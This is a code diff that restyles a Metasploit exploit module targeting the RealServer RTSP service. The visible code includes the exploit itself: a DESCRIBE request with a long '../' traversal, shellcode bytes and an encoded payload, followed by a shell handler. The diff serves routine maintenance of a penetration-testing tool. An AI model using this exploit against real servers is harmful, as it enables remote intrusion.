@@ -29,12 +29,11 @@ class MetasploitModule < Msf::Exploit::Remote
           'Space' => 2000,
           'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d"
         },
-        'Platform' => %w{bsd linux win},
         'Targets' => [
           [
             'Universal',
             {
-              'Platform' => %w{bsd linux win}
+              'Platform' => %w[bsd linux win]
             },
           ],
         ],
@@ -59,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }, 5
     )
 
-    info = http_fingerprint({ :response => res }) # check method / Custom server check
+    http_fingerprint({ response: res }) # check method / Custom server check
     if res and res['Server']
       vprint_status("Found RTSP: #{res['Server']}")
       return Exploit::CheckCode::Detected
@@ -69,15 +68,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     print_status("RealServer universal exploit launched against #{rhost}")
-    print_status("Kill the master rmserver pid to prevent shell disconnect")
+    print_status('Kill the master rmserver pid to prevent shell disconnect')
 
-    encoded = Rex::Text.to_hex(payload.encoded, "%")
+    encoded = Rex::Text.to_hex(payload.encoded, '%')
 
-    res = send_request_raw({
+    send_request_raw({
       'method' => 'DESCRIBE',
       'proto' => 'RTSP',
       'version' => '1.0',
-      'uri' => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi"
+      'uri' => '/' + ('../' * 560) + "\xcc\xcc\x90\x90" + encoded + '.smi'
     }, 5)
 
     handler
